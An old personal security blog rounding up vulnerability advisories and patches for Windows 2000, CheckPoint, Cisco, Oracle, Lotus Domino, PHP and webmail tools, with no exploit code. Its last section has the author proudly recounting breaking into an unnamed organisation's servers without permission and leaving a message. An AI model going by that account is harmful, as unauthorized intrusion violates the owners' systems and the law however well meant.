str[bits]

BBC News is reporting that the employees of a company pose the biggest threat to security.

“Digital cameras, MP3 players and handheld computers could be the tools that disgruntled UK employees use to sabotage computer systems or steal vital data, warn security experts. The removable memory cards inside the devices could be used to bring in software that looks for vulnerabilities on a company’s internal network. The innocent-looking devices could also be used to smuggle out confidential or sensitive information.”

For me this is not a new thing, in my own experience here in my present company, everyday is like a crusade in educating and implementing security to employees, and it is frustrating sometimes how slowly they are accepting issues like these.

Good early morning, here’s my “Friday the 13th Security Fix”.

Microsoft released yet (another) patch that fixes a mail relay issue in all installations of Windows 2000 Server and Advanced Server as well as in some configurations of Windows 2000 Professional. While not a huge bug, but it could allow unauthorized people to send e-mail via the server — and we don’t want to help the spammers now, do we?
[FAQ and Patch]

A vulnerability has been found in CheckPoint Firewall-1 and VPN-1 version 4.1 that would allow a remote attacker to pass arbitrary UDP packets through the firewall by including a particular malformed trojan RDP header in the packet.
[FAQ and Patch]

Linux Mandrake has released updated fetchmail packages that fix the vulnerability in fetchmail large header buffer overflow.
[Updated RPM]

Caldera Linux has released updated Webmin packages that fix the vulnerability that leaves auth data in server environment.
[Updated RPM]

Also Caldera released updated openSSH packages that fix the vulnerability known as “OpenSSH ‘cookie’ file deletion”.
[Updated RPM]

RedHat Linux has released an advisory indicating a buffer overflow in the xloadimage/faces reader, which is called from the Netscape ‘plugger’ plugin. It’s possible for malicious Web sites to execute arbitrary code on a user’s system if they have installed various packages from the RedHat Powertools version 6.2 collection.
[Updated RPM]

A recent advisory indicates a problem in poprelayd’s handling of log messages generated by qpop, which could allow a remote attacker to bypass the authentication mechanism needed to relay mail through the target system. Cobalt/Sun has confirmed this vulnerability. An updated version is available now.

phpPgAdmin CGI versions prior to 2.3 have been found to contain a vulnerability that could allow a remote attacker to view files readable by the Web server’s uid. Combined with several possible tricks to upload valid PHP code onto the Web server, this could allow a remote attacker to execute arbitrary PHP code on the server, as well. The vendor has confirmed this vulnerability and they released version 2.3,
which is available here.

The SquirrelMail PHP application versions 1.0.4 and prior make insecure calls to the PHP include() function. A remote attacker can execute arbitrary commands (and PHP code) on the remote Web server with the permissions of the Web server user, typically ‘nobody.’ The vendor has confirmed this vulnerability and released a patch, which is available here.

That’s all for today for my collection of latest security alerts and available patches. I hope this will help to informed some people concerned specially the Network and Systems Admin to upgrade their system. Remember: Security is not an option… it’s a must!

Take care everyone. Today could be your unlucky day? Read this and this.

Enjoy a worry-free day today.

Cisco was bitten by two bugs this week: a problem with its SSH{01.27.001} implementation and another bug with its on-board HTTP servers {01.27.008}. These vulnerabilities should serve as a reminder that not only do operating systems need patching and lock-down attention but infrastructure equipment does, as well. Security-savvy network administrators who have already shutdown the HTTP services on their Cisco devices proactively avoided this latest round of HTTP-based vulnerabilities.

While organizations should still upgrade their vulnerable IOS and CatOS images, proactive lock-down efforts can definitely reduce potential risks. It’s time to re-embrace some age-old wisdom: “If you aren’t using it, turn it off.”

+ + +

Oracle 8i Standard and Enterprise Editions versions 8.1.5, 8.1.6 and 8.1.7 as well as all previous versions for Windows, Linux, Solaris, AIX, HP-UX and Tru64 Unix are vulnerable to a remote denial of service attack against the TNS libraries that handle the various Oracle TNS services. The attacker does not need valid authentication credentials to mount an attack.

Oracle has confirmed this problem and produced a patch (under bug number 1656431), which is available at: http://metalink.oracle.com/

+ + +

Lotus Domino server version 5.0.6 has been found vulnerable to a Cross-Site Scripting attack. This potentially allows a malicious e-mail or Web site to execute active scripting in a user’s browser via the
vulnerable Domino site.

+ + +

An advisory indicates that a new feature in the mail() command as of PHP 4.0.5 may allow an attacker, who has Web page authoring permissions, to bypass PHP’s safe mode and execute arbitrary command line commands. This is a concern for ISPs and virtual Web hosting providers.

Yesterday I was pretty bored, feeling sleepy and unproductive. I tried to divert myself by trying something *divine*. I get into one of my beloved network (I’ll not give the details to protect them until they don’t fix the security holes), and I was really surprised they have only very minimal security. Without any sweat in my fingers, I’m able to login inside their core servers, and even to some of their clients. This is really very very very bad, and I don’t believe it. I can even alter the web pages in their web site; get the root account of their mail server – but I didn’t do it.

I send an email to one appropriate person in that domain, informing the lack of security, and leave also one message in the server addressed to the administrator.

Hopefully they will make necessary action ASAP to protect themselves to crackers (unreal hackers), because what I’d done others are more capable, and they can do unimaginable damage.

I don’t touch anything in that domain; I only leave a message to the administrator in one server, and give them friendly advice. Nothing more, believe me.